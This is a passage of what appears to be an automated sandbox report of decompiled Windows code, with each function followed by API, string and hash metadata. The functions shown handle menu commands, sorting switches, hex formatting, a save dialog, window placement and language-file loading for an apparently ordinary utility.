			_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
		}
		if(_a8 == 0x9c5e) {
			 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
			_t108 = 0;
			E0040A1DC(0, _t112, _t116, 0);
			_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
		}
		if(_a8 == 0x9c5c) {
			 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
			_t108 = 0;
			E0040A1DC(0, _t112, _t116, 0);
			E0040A3BF(_t116);
			_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
		}
		if(_a8 == 0x9c42) {
			_t74 = DestroyWindow( *(_t116 + 0x208));
		}
		if(_a8 == 0x9c49) {
			_t108 = _t116;
			_t74 = E0040B0C2(_t116);
		}
		if(_a8 == 0x9c56) {
			 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
			_t108 = 0;
			E0040A1DC(0, _t112, _t116, 0);
			_t74 = E0040A6FF(_t116);
		}
		if(_a8 == 0x9c44) {
			_t74 = E00401BDC(_t116, 0x415);
		}
		if(_a8 == 0x9c43) {
			E0040133A( &_v1092);
			_v1092 = 0x410428;
			E00401000( &_v1028, _t112, 0x412290);
			_t108 =  &_v518;
			E00401000( &_v518, _t112, 0x4122c4);
			_t132 = _v1176;
			_push( *((intOrPtr*)(_t132 + 0x208)));
			_push( &_v1092);
			_t93 = 0x70;
			E0040152F(_t93);
			E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
			_t74 = E00401357( &_v1100);
			_t116 = _t132;
		}
		_t154 = _a8 - 0x9c41;
		if(_a8 == 0x9c41) {
			_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
		}
		if(_a8 != 0x9c47) {
			L27:
			__eflags = _a8 - 0x9c4f;
			if(_a8 != 0x9c4f) {
				L31:
				__eflags = _a8 - 0x9c48;
				if(__eflags == 0) {
					_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
				}
				__eflags = _a8 - 0x9c45;
				if(_a8 == 0x9c45) {
					 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
					__eflags = 0;
					E0040A1DC(0, _t112, _t116, 0);
					_t74 = E0040A6FF(_t116);
				}
				__eflags = _a8 - 0x9c46;
				if(__eflags == 0) {
					_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
				}
				__eflags = _a8 - 0x9c4a;
				if(__eflags == 0) {
					_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
				}
				__eflags = _a8 - 0x9c65;
				if(__eflags == 0) {
					_t74 = E0040B054(_t116, __eflags);
				}
				__eflags = _a8 - 0x9c4b;
				if(_a8 == 0x9c4b) {
					E0040133A( &_v1172);
					_v1100 = _v1100 & 0x00000000;
					_v1172 = 0x40f7a8;
					E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
					_t82 = _v1184;
					_t113 =  *((intOrPtr*)(_v1184 + 0x698));
					__eflags =  *((intOrPtr*)(_t113 + 0x224));
					if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
						__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
						if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
							E0040B00A(_t82);
						}
					}
					_v1172 = 0x40f7a8;
					_t74 = E00401357( &_v1172);
					_t116 = _v1176;
				}
				__eflags = _a8 - 0x9c4c;
				if(_a8 == 0x9c4c) {
					_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
				}
				__eflags = _a8 - 0x9c58;
				if(_a8 == 0x9c58) {
					_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
				}
				__eflags = _a8 - 0x9c4e;
				if(_a8 == 0x9c4e) {
					_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
				}
				goto L52;
			}
			_t88 =  *((intOrPtr*)(_t116 + 0x69c));
			__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
			if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
				_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
				goto L31;
			}
			_push(0xf000);
			_push(0x1000);
			goto L25;
		} else {
			_t88 =  *((intOrPtr*)(_t116 + 0x69c));
			if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
				_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
				goto L27;
			}
			_push(0xf000);
			_push(0x2000);
			L25:
			_push(0xffffffff);
			_t74 = E004077D8(_t88);
			goto L52;
		}
	} else {
		L52:
		return _t74;
	}
}
                                                                                                                                                0x0040b478
                                                                                                                                                0x0040b47e
                                                                                                                                                0x0040b482
                                                                                                                                                0x0040b482
                                                                                                                                                0x0040b48d
                                                                                                                                                0x0040b4bf
                                                                                                                                                0x0040b4bf
                                                                                                                                                0x0040b4c5
                                                                                                                                                0x0040b4ed
                                                                                                                                                0x0040b4ed
                                                                                                                                                0x0040b4f3
                                                                                                                                                0x0040b4f7
                                                                                                                                                0x0040b4f7
                                                                                                                                                0x0040b4fc
                                                                                                                                                0x0040b502
                                                                                                                                                0x0040b50a
                                                                                                                                                0x0040b50e
                                                                                                                                                0x0040b512
                                                                                                                                                0x0040b517
                                                                                                                                                0x0040b517
                                                                                                                                                0x0040b51c
                                                                                                                                                0x0040b522
                                                                                                                                                0x0040b528
                                                                                                                                                0x0040b528
                                                                                                                                                0x0040b52d
                                                                                                                                                0x0040b533
                                                                                                                                                0x0040b539
                                                                                                                                                0x0040b539
                                                                                                                                                0x0040b53e
                                                                                                                                                0x0040b544
                                                                                                                                                0x0040b548
                                                                                                                                                0x0040b548
                                                                                                                                                0x0040b54d
                                                                                                                                                0x0040b553
                                                                                                                                                0x0040b559
                                                                                                                                                0x0040b564
                                                                                                                                                0x0040b56e
                                                                                                                                                0x0040b588
                                                                                                                                                0x0040b58d
                                                                                                                                                0x0040b591
                                                                                                                                                0x0040b597
                                                                                                                                                0x0040b59e
                                                                                                                                                0x0040b5a0
                                                                                                                                                0x0040b5a7
                                                                                                                                                0x0040b5a9
                                                                                                                                                0x0040b5a9
                                                                                                                                                0x0040b5a7
                                                                                                                                                0x0040b5b2
                                                                                                                                                0x0040b5b6
                                                                                                                                                0x0040b5bb
                                                                                                                                                0x0040b5bb
                                                                                                                                                0x0040b5bf
                                                                                                                                                0x0040b5c5
                                                                                                                                                0x0040b5cd
                                                                                                                                                0x0040b5cd
                                                                                                                                                0x0040b5d2
                                                                                                                                                0x0040b5d8
                                                                                                                                                0x0040b5e0
                                                                                                                                                0x0040b5e0
                                                                                                                                                0x0040b5e5
                                                                                                                                                0x0040b5eb
                                                                                                                                                0x0040b5f9
                                                                                                                                                0x0040b5f9
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b5eb
                                                                                                                                                0x0040b4c7
                                                                                                                                                0x0040b4cd
                                                                                                                                                0x0040b4d4
                                                                                                                                                0x0040b4e8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b4e8
                                                                                                                                                0x0040b4d6
                                                                                                                                                0x0040b4db
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b48f
                                                                                                                                                0x0040b48f
                                                                                                                                                0x0040b49c
                                                                                                                                                0x0040b4ba
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b4ba
                                                                                                                                                0x0040b49e
                                                                                                                                                0x0040b4a3
                                                                                                                                                0x0040b4a8
                                                                                                                                                0x0040b4a8
                                                                                                                                                0x0040b4aa
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b4aa
                                                                                                                                                0x0040b5fe
                                                                                                                                                0x0040b5fe
                                                                                                                                                0x0040b604
                                                                                                                                                0x0040b604

APIs
• InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
• DestroyWindow.USER32(?), ref: 0040B3C7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: DestroyInvalidateRectWindow
• String ID: 33@
• API String ID: 724544332-1541121659
• Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
• Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
• Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
• Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
E0040A4C2(void* __eax) {
    void* __ebx;
    void* __edi;
    short* __esi;
    void* _t24;
    int _t27;
    void* _t36;
    intOrPtr* _t43;

    _t36 = __eax;
    if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
        L11:
        E0040528C();
         *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
         *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
        _t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
        __eflags = _t24 - 0xffffffff;
        if(_t24 != 0xffffffff) {
            L15:
            goto L1;
        }
        __eflags =  *0x4131d4; // 0x1
        _t43 =  *((intOrPtr*)(_t36 + 0x69c));
        if(__eflags == 0) {
             *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
             *0x4131d4 = 1;
        }
        _t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
        qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
        goto L15;
    } else {
        do {
            __ecx = __esi;
            __eax = E004065EE(__eax, __esi, L"/sort");
            __eflags = __eax;
            if(__eax != 0) {
                __eax =  *((intOrPtr*)(__edi + 0x6c0));
                _t4 = __esi + 1; // 0x1
                __ecx = _t4;
                __eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
                if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
                    __ecx = 0x40f454;
                } else {
                    __ecx = __eax;
                }
                __eflags =  *__ecx - 0x7e;
                __eax =  *((intOrPtr*)(__edi + 0x69c));
                if(__eflags != 0) {
                } else {
                    _push(1);
                    __ecx = __ecx + 2;
                }
                _push(__ecx);
                __eax = E0040A084(__eax, __eflags);
            }
            __eax =  *((intOrPtr*)(__edi + 0x6c0));
            __esi = __esi + 1;
            __eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
        } while (__esi <  *((intOrPtr*)(__eax + 0x30)));
        goto L11;
    }
    L1:
    return SetCursor( *0x412390);
}

                                                                                                                                                APIs
                                                                                                                                                • qsort.MSVCRT ref: 0040A591
                                                                                                                                                  • Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                • Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                • Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
                                                                                                                                                • Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                • Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                				void* _v8;
                                                                                                                                                				void* _v26;
                                                                                                                                                				void _v28;
                                                                                                                                                				void* _t24;
                                                                                                                                                				void* _t25;
                                                                                                                                                				void* _t35;
                                                                                                                                                				signed int _t38;
                                                                                                                                                				signed int _t42;
                                                                                                                                                				void* _t44;
                                                                                                                                                				void* _t45;
                                                                                                                                                
                                                                                                                                                				_t24 = _a12;
                                                                                                                                                				_t45 = _t44 - 0x18;
                                                                                                                                                				_t42 = 0;
                                                                                                                                                				 *_t24 = 0;
                                                                                                                                                				if(_a8 <= 0) {
                                                                                                                                                					_t25 = 0;
                                                                                                                                                				} else {
                                                                                                                                                					_t38 = 0;
                                                                                                                                                					_t35 = 0;
                                                                                                                                                					if(_a8 > 0) {
                                                                                                                                                						_v8 = _t24;
                                                                                                                                                						while(1) {
                                                                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                                                                							asm("stosd");
                                                                                                                                                							asm("stosd");
                                                                                                                                                							asm("stosd");
                                                                                                                                                							asm("stosd");
                                                                                                                                                							asm("stosw");
                                                                                                                                                							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                							_push(L"%2.2X ");
                                                                                                                                                							_push(0xa);
                                                                                                                                                							_push( &_v28);
                                                                                                                                                							L0040DFD6();
                                                                                                                                                							_t38 = _t42;
                                                                                                                                                							memcpy(_v8,  &_v28, 6);
                                                                                                                                                							_t13 = _t42 + 3; // 0x3
                                                                                                                                                							_t45 = _t45 + 0x1c;
                                                                                                                                                							if(_t13 >= 0x2000) {
                                                                                                                                                								break;
                                                                                                                                                							}
                                                                                                                                                							_v8 = _v8 + 6;
                                                                                                                                                							_t35 = _t35 + 1;
                                                                                                                                                							_t42 = _t42 + 3;
                                                                                                                                                							if(_t35 < _a8) {
                                                                                                                                                								continue;
                                                                                                                                                							}
                                                                                                                                                							break;
                                                                                                                                                						}
                                                                                                                                                						_t24 = _a12;
                                                                                                                                                					}
                                                                                                                                                					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                                                					_t25 = 1;
                                                                                                                                                				}
                                                                                                                                                				return _t25;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                • Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                • Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
                                                                                                                                                • Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                • Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    intOrPtr _v36;
    intOrPtr _v44;
    intOrPtr _v48;
    signed int _v52;
    signed int _v60;
    intOrPtr _v64;
    wchar_t* _v68;
    intOrPtr _v72;
    signed int _v80;
    intOrPtr _v84;
    intOrPtr _v92;
    struct tagOFNA _v96;
    intOrPtr _t23;
    intOrPtr* _t33;
    intOrPtr _t34;
    wchar_t* _t38;

    _t38 = __edi;
    _t34 = __ecx;
    _t33 = __ebx;
    _t23 = 1;
    if(__ebx != 0) {
        _t23 = *__ebx;
    }
    _v80 = _v80 & 0x00000000;
    _v60 = _v60 & 0x00000000;
    _v52 = _v52 & 0x00000000;
    _v72 = _t23;
    _v48 = _a8;
    _v36 = _a12;
    _v92 = _t34;
    _v96 = 0x58;
    _v84 = _a4;
    _v68 = _t38;
    _v64 = 0x104;
    _v44 = 0x80806;
    if(GetSaveFileNameW(&_v96) == 0) {
        return 0;
    } else {
        if(_t33 != 0) {
            *_t33 = _v72;
        }
        wcscpy(_t38, _v68);
        return 1;
    }
}

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: FileNameSavewcscpy
• String ID: X
• API String ID: 3080202770-3081909835
• Opcode ID: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
• Instruction ID: 35274199d236effe9a648b535348c56afb13a0cf633c63e6ee0ccd6430c010a7
• Opcode Fuzzy Hash: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
• Instruction Fuzzy Hash: D80192B1D106599FDF10DFE9D88479EBBF4FB08319F10842AE815EA284DBB499098F54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
    intOrPtr _v8;
    void* __ebx;
    intOrPtr _t10;
    void* _t14;
    WINDOWPLACEMENT* _t15;
    void* _t18;
    struct HWND__* _t23;
    intOrPtr* _t24;

    _t24 = __esi;
    _t18 = __eax;
    _t1 = _t24 + 4; // 0x40d794
    _t10 = *_t1;
    _v8 = _t10;
    if(_t10 == 0) {
        memset(__eax + 0x248, 0, 0x2c);
    } else {
        _t23 = *(__eax + 0x208);
        if(_t23 != 0) {
            _t15 = __eax + 0x248;
            _t15->length = 0x2c;
            GetWindowPlacement(_t23, _t15);
        }
    }
    _t14 = *((intOrPtr*)(*_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
    if(_v8 == 0) {
        _t14 = E004019D2(_t18);
    }
    return _t14;
}

APIs
• GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
• memset.MSVCRT ref: 004019A7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
• Opcode ID: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
• Instruction ID: 309fedf9ece379f47234066dfb297f1f11f9bdd101b0f57d7b7a510f29a8e9ac
• Opcode Fuzzy Hash: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
• Instruction Fuzzy Hash: 3CF062B0610204EFEB54DF55C899FAE33E99F04700F54017AE9099F1D1EBB89D44C769
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
    void _v8198;
    short _v8200;
    int _t11;
    int _t16;

    E0040E340(0x2004, __ecx);
    _t16 = 0;
    _v8200 = 0;
    memset(&_v8198, 0, 0x2000);
    do {
        _t11 = LoadStringW(_a4, _t16, &_v8200, 0x1000);
        if(_t11 > 0) {
            _t11 = E00406E5E(_t16, &_v8200);
        }
        _t16 = _t16 + 1;
    } while (_t16 <= 0xffff);
    return _t11;
}

APIs
• memset.MSVCRT ref: 00407194
• LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC
  • Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
  • Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: memset$LoadString_itow
• String ID: ;t@
• API String ID: 2363904170-3941608961
• Opcode ID: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
• Instruction ID: 51c9355171e471fb499396a2aa2e6012e16bb247b54c8a94724daa36fdc5b9b4
• Opcode Fuzzy Hash: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
• Instruction Fuzzy Hash: 5BF0A73290032829F724AA56DD4ABDB7B6CDF05754F0000B6BB0CF61D2D634AA50CBEE
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004073D0(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00405800(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}






APIs
  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
• wcsrchr.MSVCRT ref: 004073D9
• wcscat.MSVCRT ref: 004073EF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
• Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
• Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
• Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
• Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
			E004075A6(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t33;
				intOrPtr* _t42;

				_t42 = __esi;
				 *__esi = 0x410168;
				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
				_t33 = E00405CF8(0x34c, __esi);
				_push(0x14);
				 *((intOrPtr*)(__esi + 0x33c)) = 0;
				 *((intOrPtr*)(__esi + 0x348)) = 0;
				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 8)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
				return _t42;
			}





                                                                                                                                                0x00407687
                                                                                                                                                0x0040768d

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                • Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                • Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
                                                                                                                                                • Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                • Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                                                				int _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				void* __edi;
                                                                                                                                                				int _t32;
                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                				signed int _t48;
                                                                                                                                                				signed int _t58;
                                                                                                                                                				signed int _t59;
                                                                                                                                                				void** _t62;
                                                                                                                                                				void** _t63;
                                                                                                                                                				signed int* _t66;
                                                                                                                                                
                                                                                                                                                				_t66 = __eax;
                                                                                                                                                				_t32 = wcslen(_a4);
                                                                                                                                                				_t48 =  *(_t66 + 4);
                                                                                                                                                				_t58 = _t48 + _t32;
                                                                                                                                                				_v12 = _t58;
                                                                                                                                                				_t59 = _t58 + 1;
                                                                                                                                                				_v8 = _t32;
                                                                                                                                                				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                                                				 *(_t66 + 4) = _t59;
                                                                                                                                                				_t62 = _t66 + 0x10;
                                                                                                                                                				if(_t59 != 0xffffffff) {
                                                                                                                                                					E0040562D(_t66, _t59, _t62, 2, _t33);
                                                                                                                                                				} else {
                                                                                                                                                					free( *_t62);
                                                                                                                                                				}
                                                                                                                                                				_t60 =  *(_t66 + 0x1c);
                                                                                                                                                				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                				_t63 = _t66 + 0xc;
                                                                                                                                                				if( *(_t66 + 0x1c) != 0xffffffff) {
